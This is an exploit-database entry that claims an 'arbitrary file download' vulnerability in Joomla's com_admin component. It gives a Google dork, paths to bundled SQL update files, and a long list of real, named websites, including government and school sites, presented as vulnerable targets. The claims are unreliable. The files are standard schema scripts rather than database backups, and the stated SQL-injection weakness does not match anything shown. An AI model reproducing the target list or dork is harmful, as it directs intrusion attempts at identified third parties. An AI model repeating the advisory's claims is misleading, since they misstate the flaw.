Joomla com_admin Components from V2.5.4 to V3.7.4 Database Backup Arbitrary File Download Vulnerability

2018.11.20
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

################################################################################################# # Exploit Title : Joomla com_admin Components from V2.5.4 to V3.7.4 Database Backup Arbitrary File Download Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 19/11/2018 # Vendor Homepage : joomla.org + github.com/joomla-projects/gsoc18_override_management/tree/master/administrator/components/com_admin # Tested On : Windows and Linux # Category : WebApps # Version Information : V2.5.4 - V2.5.6 - V2.5.7 - V3.0.0 3.0.1 V3.0. V3.0.3 V3.1.0 V3.1.1 V3.1.2 V3.1.3 V3.1.4 V3.1.5 V3.2.0 V3.2.1 V3.4.0 V3.7.4 and if etcetera.... # Google Dorks : inurl:''/administrator/components/com_admin/sql/'' # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Admin Panel Login Path : /administrator ################################################################################################# # Exploit : Check this folders => /joomla/administrator/components/com_admin/sql/others/mysql/...... /PATH/PATH/administrator/components/com_admin/sql/others/mysql/...... /PATH/administrator/components/com_admin/sql/updates/mysql/...... /administrator/components/com_admin/sql/updates/mysql/...... /administrator/components/com_admin/sql/updates/postgresql/....... /administrator/components/com_admin/sql/updates/sqlazure/...... /administrator/components/com_admin/sql/updates/mysql/2.5.4-[YEAR]-[MONTH]-[DAY].sql /administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql /administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-19.sql /administrator/components/com_admin/sql/updates/mysql/2.5.5.sql /administrator/components/com_admin/sql/updates/mysql/2.5.6.sql /administrator/components/com_admin/sql/updates/mysql/2.5.7.sql /administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql /PATH/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql /administrator/components/com_admin/sql/updates/sqlazure/2.5.4-[YEAR]-[MONTH]-[DAY].sql /administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-18.sql /administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-19.sql /administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql /administrator/components/com_admin/sql/updates/sqlazure/2.5.6.sql /administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql /administrator/components/com_admin/sql/updates/mysql/2.5.[THIS-NUMBER-CHANGES-].sql ################################################################################################# # Example Vulnerable Sites => [+] xpilot-ai.org/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql [+] colegiosanpedroclaver.edu.co/administrator/components/com_admin/sql/updates/postgresql/3.0.2.sql [+] freightdb.kzntransport.gov.za/administrator/components/com_admin/sql/updates/postgresql/3.1.0.sql [+] speccontrol.pl/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql [+] integratedfg.com/administrator/components/com_admin/sql/updates/mysql/2.5.9.sql [+] elroyce.com/home/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql [+] groupepromotran.net/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql [+] clicdesourischemille.fr/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql [+] elmwoodnebraska.com/nl/administrator/components/com_admin/sql/updates/postgresql/3.9.0-2018-06-14.sql [+] kkn.cz/gdpr/administrator/components/com_admin/sql/updates/mysql/3.2.1.sql [+] flauzac.eu/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql [+] cd06ffme.fr/joomla/administrator/components/com_admin/sql/updates/sqlazure/2.5.15.sql [+] alcbrh.com/supp%209/joomla/administrator/components/com_admin/sql/updates/postgresql/3.2.0.sql [+] sunshrine.com/administrator/components/com_admin/sql/updates/mysql/2.5.14.sql.encrypted [+] murraynebraska.com/nl/administrator/components/com_admin/sql/updates/sqlazure/3.2.1.sql [+] witecc.com/wit/administrator/components/com_admin/sql/updates/mysql/3.0.2.sql [+] recursosvirtualesperu.com/joomla/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql [+] library.franklincountyva.gov/administrator/components/com_admin/sql/updates/postgresql/3.0.3.sql [+] tgr.org.hk/administrator/components/com_admin/sql/updates/postgresql/3.1.1.sql [+] sheltonbeach.org/administrator/components/com_admin/sql/updates/sqlazure/2.5.9.sql [+] labarjaque.com/administrator/components/com_admin/sql/updates/mysql/3.0.3.sql [+] vir.nw.ru/test/vir.nw/administrator/components/com_admin/sql/updates/mysql/3.0.3.sql [+] gammarth-immobiliere.tn/new/administrator/components/com_admin/sql/updates/postgresql/3.1.3.sql [+] hfcforestry.com/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql [+] clickhouseghana.com/EchoStop/administrator/components/com_admin/sql/updates/postgresql/3.4.4-2015-07-11.sql [+] seaportsa.com/es/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql [+] avagarrett.net/__MACOSX/bt_education_v3.0.0_j25_quickstart/administrator/components/com_admin/sql/updates/mysql/._1.7.0.sql [+] suntechmed.com/__MACOSX/suntechmed15/administrator/components/com_admin/sql/updates/sqlazure/._3.1.3.sql [+] villaalena.cz/administrator/components/com_admin/sql/updates/mysql/3.0.2.sql [+] colo-passion.fr/site/videoprivate/administrator/components/com_admin/sql/updates/sqlazure/2.5.21.sql [+] cosemsmg.org.br/site/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql [+] djabugay.org.au/Joomla/administrator/components/com_admin/sql/updates/sqlazure/3.1.5.sql [+] stoneandequipment.com/panama/administrator/components/com_admin/sql/updates/postgresql/3.1.5.sql [+] brisbug.asn.au/administrator/components/com_admin/sql/updates/postgresql/3.0.2.sql [+] lopes.im/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql [+] institutoagricola.com/administrator/components/com_admin/sql/updates/sqlazure/3.7.4-2017-07-05.sql [+]operaciavianocnedieta.sk/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql [+] billybobproducts.com/whitetaleslodge/administrator/components/com_admin/sql/updates/mysql/1.7.0.sql [+] operaciavianocnedieta.sk/administrator/components/com_admin/sql/updates/sqlazure/3.0.1.sql [+] arnes.si/~sspmmetl/administrator/components/com_admin/sql/updates/mysql/3.1.4.sql [+]wenscom.it/administrator/components/com_admin/sql/updates/mysql/3.1.2.sql [+] cheerleading.com.sg/events/administrator/components/com_admin/sql/updates/mysql/3.4.0-2014-09-16.sql [+] osm.chiangrai.net/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql [+] datacomplete.com/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql [+] mail.nisselwater.com/joomla30/administrator/components/com_admin/sql/updates/mysql/3.1.2.sql [+] hcerstein.com/joomla/administrator/components/com_admin/sql/updates/mysql/2.5.13.sql [+] epmanagementconsult.com/__MACOSX/administrator/components/com_admin/sql/updates/mysql/._3.1.1.sql [+] mvapower.com/MVASITE/administrator/components/com_admin/sql/updates/mysql/3.0.1.sql [+] allamericanbailbonds.com/__MACOSX/allamericanbailbonds.com/administrator/components/com_admin/sql/updates/mysql/._2.5.6.sql [+] municipalidadelbosque.cl/joomla/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql [+] yurtyay.com.tr/administrator/components/com_admin/sql/updates/postgresql/3.0.2.sql [+] universoautista.com.br/portal/administrator/components/com_admin/sql/updates/mysql/2.5.10.sql [+] hoefelmayr.net/Joomla/administrator/components/com_admin/sql/updates/mysql/2.5.10.sql [+] patrioticsolutions.com/sites/askkarate/administrator/components/com_admin/sql/updates/mysql/3.1.4.sql [+] hazelgreenfire.org/home/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql [+] misioneritasarcadsa.com.ar/Joomla/administrator/components/com_admin/sql/updates/postgresql/3.0.3.sql [+]staszickutno.pl/jbip/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-06.sql [+] pkiakks.org/web2/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql [+] ctnanotubos.com.br/projetos/administrator/components/com_admin/sql/updates/mysql/3.4.0-2014-12-03.sql [+] dev.intellizim.com/ppeinternational/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql [+] positanolirica.com.ar/positano/administrator/components/com_admin/sql/updates/postgresql/3.1.0.sql [+] reptileone.com.au/__MACOSX/shaper_awetive_quickstart_j3/administrator/components/com_admin/sql/updates/mysql/._2.5.11.sql [+] sportxanalitix.com/home/administrator/components/com_admin/sql/updates/mysql/3.6.0-2016-04-06.sql [+] tecso.com.mx/v2/__MACOSX/blog/administrator/components/com_admin/sql/updates/mysql/._3.0.1.sql [+] kohinoortarpaulin.net/administrator/components/com_admin/sql/updates/sqlazure/3.1.1.sql [+] raphstudio.com.br/site/v1/administrator/components/com_admin/sql/updates/sqlazure/3.1.5.sql [+] fotozrak.mk/print/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql [+] idealkorpus.com/pt/administrator/components/com_admin/sql/updates/postgresql/3.0.3.sql [+] ateliedearomas.com.br/atelie/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql [+] bristolacneremoval.co.uk/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql [+] moob.cl/clientes/__MACOSX/puc/administrator/components/com_admin/sql/others/mysql/._utf8mb4-conversion-01.sql [+] skansjofrakt.se/joo2/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql [+] utilsoluciones.com/en/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql [+] igorgalic.freeserverhost.com/joomla/administrator/components/com_admin/sql/updates/mysql/2.5.1-2012-01-26.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top